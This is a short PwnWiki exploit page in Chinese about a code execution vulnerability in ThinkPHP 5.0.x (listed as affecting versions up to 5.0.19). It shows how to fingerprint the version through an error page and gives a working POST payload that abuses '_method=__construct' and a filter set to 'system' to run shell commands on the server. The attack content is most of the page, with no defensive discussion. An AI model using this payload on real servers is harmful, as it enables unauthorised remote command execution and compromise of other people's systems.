ThinkPHP 5.0.13 代码执行漏洞

From PwnWiki
This page is a translated version of the page ThinkPHP 5.0.13 代碼執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

影响版本

ThinkPHP <= v5.0.19

漏洞利用

通过报错确定ThinkPHP版本 

http://127.0.0.1/tk5/public/index.php/111

Payload

http://127.0.0.1/tk5/public/index.php

post发送数据 

s=whoami&_method=__construct&method=&filter[]=system
Retrieved from "https://pwnwiki.com/index.php?title=ThinkPHP_5.0.13_代碼執行漏洞/zh-cn&oldid=6226"